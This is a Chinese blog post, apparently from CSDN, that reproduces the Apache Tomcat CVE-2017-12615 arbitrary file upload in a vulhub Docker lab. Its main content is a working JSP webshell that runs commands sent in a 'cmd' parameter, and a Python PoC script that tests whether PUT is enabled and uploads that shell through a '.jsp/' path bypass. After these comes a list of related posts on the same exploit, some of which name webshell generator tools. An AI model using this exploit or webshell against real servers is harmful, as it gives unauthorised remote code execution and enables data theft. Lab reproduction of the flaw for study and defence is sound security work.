CVE-2017-12615(Tomcat任意文件上传漏洞)复现

最新推荐文章于 2025-06-07 17:56:24 发布
最新推荐文章于 2025-06-07 17:56:24 发布
阅读量1.4k 收藏 3
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: CVE-2017-12615 Tomcat任意文件上传漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Jerry____/article/details/103386126
本文详细介绍了Apache Tomcat CVE-2017-12615漏洞,包括影响版本、环境搭建、漏洞利用过程及Python POC脚本。展示了如何利用该漏洞进行任意脚本上传并执行命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一:漏洞介绍

1.影响版本:Apache Tomcat 7.0.0 - 7.0.81
2.可以任意上传脚本文件

二:环境搭建

利用vulhub搭建环境
1、进入vulhub对应的漏洞目录下

cd  /vulhub/tomcat/CVE-2017-12615

2.一键搭建环境

docker-compose up -d
三:漏洞利用

1、进入http://your-ip:8080,查看环境是否搭建成功。

在这里插入图片描述
2、对页面抓包。
在这里插入图片描述
EXP:

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>

3、go
在这里插入图片描述
响应201,上传成功。
4、打开http://your-ip:8080/123.jsp,检查是否可以查看上传文件。
在这里插入图片描述
成功。
5、打开http://your-ip:8080/123.jsp?&pwd=023&cmd=id
在这里插入图片描述
成功运行cmd命令

大神的python POC脚本

运行这个脚本文件,会生成一个shell,直接打开,http://your-ip:8080/生成的shell?&pwd=023&cmd=id,直接可以检测利用漏洞。

#! -*- coding:utf-8 -*- 
import httplib
import sys
import time
body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'''
try:
    conn = httplib.HTTPConnection(sys.argv[1])
    conn.request(method='OPTIONS', url='/ffffzz')
    headers = dict(conn.getresponse().getheaders())
    if 'allow' in headers and \
       headers['allow'].find('PUT') > 0 :
        conn.close()
        conn = httplib.HTTPConnection(sys.argv[1])
        url = "/" + str(int(time.time()))+'.jsp/'
        #url = "/" + str(int(time.time()))+'.jsp::$DATA'
        conn.request( method='PUT', url= url, body=body)
        res = conn.getresponse()
        if res.status  == 201 :
            #print 'shell:', 'http://' + sys.argv[1] + url[:-7]
            print 'shell:', 'http://' + sys.argv[1] + url[:-1]
        elif res.status == 204 :
            print 'file exists'
        else:
            print 'error'
        conn.close()
    else:
        print 'Server not vulnerable'
        
except Exception,e:
    print 'Error:', e

在这里插入图片描述
直接打开
在这里插入图片描述

移除环境
docker-compose down
tomcat漏洞学习——CVE-2017-12615Tomcat任意写入文件漏洞
记录并分享学习安全的知识点..
05-05 1059
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 目录 警告 一、概述 二、影响版本 三、漏洞原理 四、环境搭建 五、 漏洞复现 (一)手动验证复现 1.首先抓包,验证jsp文件: 2.发现404页面,换成txt文件,发现可以的: 3.根据源码,只要在jsp小马后面加一个/,就可以上传成功: 4.小马利用: ​(二)exp验证复现 ​(三)工具检测 一、概述 tomcat的配置具有可写权限,因此可以利用put方法上传任意文件。但是tomcat对...
漏洞复现Tomcat CVE-2017-12615 (任意文件上传漏洞)
李火火的安全圈
02-16 2770
文章目录前言一、漏洞描述二、影响版本三、漏洞分析四、本地复现五、修复建议 前言 本篇文章仅用于安全研究和技能学习,切勿用于非授权情况下渗透攻击行为,出现任何后果与本文作者无关。 一、漏洞描述 但存在漏洞Tomcat运行在Windows/Linux主机上,且启用了HTTP PUT请求方法(例如将 “readonly” 初始化参数由默认值设置为 “false”),攻击者通过精心构造的攻击请求数据包向服务器上传包含任意代码的JSP的WebShell文件,JSP文件中的恶意代码将能被服务器执行,导致服务器
Tomcat任意文件写入(CVE-2017-12615)漏洞复现
weixin_45540609的博客
07-28 2218
一、漏洞原理 影响范围:pache Tomcat7.0.0-7.0.81(默认配置) 如果配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有操作系统上的潜在危险的远程执行代码(RCE)漏洞CVE-2017-12615:远程代码执行漏洞。只需参数readonly设置为false或者使用参数readonly设置启用WebDAV servlet false。此配置将允许任何未经身份验证的用户上传文件(如WebDAV中所使用的).
漏洞复现CVE-2017-12615
Blood_Pupil的博客
03-16 3350
利用方式 MSDN All files on an NTFS volume consist of at least one stream - the main stream – this is the normal, viewable file in which data is stored. The full name of a stream is of the form below. ...
tomcat CVE-2017-12615漏洞复现
最新发布
weixin_52463619的博客
06-07 199
(1)在 URL 中写入一 /1.jsp/,这个就是我们要写入到服务器中文件.(记得后缀是jsp和木马一样),然后 burp 抓包修改文件头为 put,将哥斯拉生成的文件内容一起发送,可以看到返回 201,上传成功。这样将导致可以使用PUT方法上传任意文件tomcat的安全机制是不允许直接上传.jsp的文件,但是可以绕过上传),可以在用户服务器上执行任意代码,可能会导致用户获取服务器的权限使数据遭到篡改、泄露。点击生成,选择 jsp,文件名保存为 jsp 后缀。使用哥斯拉生成木马文件上传到 1.jsp。
Tomcat任意文件上传漏洞CVE-2017-12615
qq_58000413的博客
09-15 1189
访问222.jsp页面发现有内容(这里是Hello java的原因是我自己已经上传过一次,由于已经实操过一遍不想再次上传所以就用了第一次实操的222.jsp文件,还请见谅)验证成功,则当我们上传的内容是jsp的一句话那么我们就可以拿下这台服务器,这里由于是自己购买的服务器就不上传一句话木马了。总体来说这个漏洞复现起来还是比较简单的。Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616,其中 远程代码执行漏洞CVE-2017-12615
CVE-2017-12615(远程代码执行漏洞
Biu_Biu_Bi的博客
04-07 4531
Tomcat 运行在 Windows 操作系统时,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。2、使用burpsuite抓包,修改GET为PUT上传方式,添加文件名1.jsp/,添加shell脚本。1、使用冰蝎v4.05生成jsp脚本。5、打开ip:8080,成功开启。4、测试成功上传Shell。
tomcat7.x远程命令执行(CVE-2017-12615漏洞利用复现
m0_58606546的博客
01-11 4490
一、漏洞前言 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616,该漏洞受影响版本为7.0-7.80之间,在一定条件下,攻击者可以利用这两个漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意JSP文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码,从而导致数据泄露或获取服务器权限,存在高安全风险 二、漏洞名称 CVE-2017-12615-远程代
CVE-2017-12615 Tomcat PUT方法任意写文件漏洞
weixin_51387754的博客
01-04 2463
漏洞简介 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616,其中 远程代码执行漏洞CVE-2017-12615) 影响: Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全) 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务
Tomcat 任意写入文件漏洞CVE-2017-12615
ANOrange的博客
03-29 613
Tomcat 任意写入文件漏洞CVE-2017-12615漏洞复现
Tomcat PUT方法任意写文件漏洞CVE-2017-12615
weixin_45653478的博客
05-02 1940
在Apache Tomcat服务器中,PUT方法通常用于上传文件。攻击者可以通过发送PUT请求,将恶意文件上传到服务器。当攻击者发送PUT请求时,Tomcat服务器会将请求中的数据写入指定的文件。如果攻击者能够控制文件路径,那么他们可以将恶意文件写入任意位置,从而实现任意文件写入。
Apache Tomcat任意文件上传漏洞(CVE-2017-12615)
ran的博客
01-31 2283
Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件,并且能被服务器执行。2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616。漏洞影响:上传包含任意代码的文件,并且能被服务器执行。放包后再次访问“1.jsp”,发现存在了。
Tomcat任意文件上传CVE-2017-12615漏洞复现(附POC)
byt8563的博客
06-30 4472
欢迎使用Markdown编辑器 • 漏洞名称:Tomcat任意文件上传漏洞漏洞编号:CVE-2017-12615漏洞影响:上传包含任意代码的文件,并被服务器执行。 • 影响平台:Windows • 影响版本:Apache Tomcat 7.0.0 - 7.0.81 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,
[CVE-2017-12615]漏洞复现
https://www.cnblogs.com/zpchcbd/
05-07 2647
漏洞编号CVE-2017-12615 漏洞影响的tomcat版本为tomcat7.0.0-7.0.81版本 环境搭建 docker搭建 ubuntu16.04+docker sudo docker-compose up -d 手动搭建 tomcat7.0.0-7.0.81 环境 然后自己去配置当前目录下的/conf/web.xml 添加如下代码: readonly false 利用...
CVE-2017-12615漏洞复现
weixin_44831109的博客
03-30 1477
1.靶场172.168.20.176(内网的外网访问不到) 2.使用goby 发现8080端口开放以及一个高危漏洞 发现CVE-2017-12615漏洞 3.使用burpsuit抓包 发送給重发器 将get方法改成put方法 上传一个jsp一句话木马 更改发送到右边显示这样说明成功 木马成功上传 4.使用冰蝎 连接密码是冰蝎默认的 root权限 ...
Tomcat CVE-2017-12615漏洞复现
2401_82451607的博客
09-20 942
Tomcat CVE-2017-12615漏洞复现
漏洞复现Tomcat PUT方法任意写文件漏洞CVE-2017-12615
weixin_42090431的博客
01-02 1086
2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616,其中 远程代码执行漏洞CVE-2017-12615) 影响: Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)
Tomcat漏洞CVE-2017-12615复现
Leslieyzz的博客
02-12 272
Tomcat漏洞CVE-2017-12615复现
cve-2017-12615漏洞复现
06-28
cve-2017-12615漏洞是Apache Tomcat服务器中的一个远程代码执行漏洞。攻击者可以通过发送特定的HTTP请求来利用该漏洞,从而在服务器上执行任意代码。 要复现漏洞,需要满足以下条件: 1. 目标服务器上运行的是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值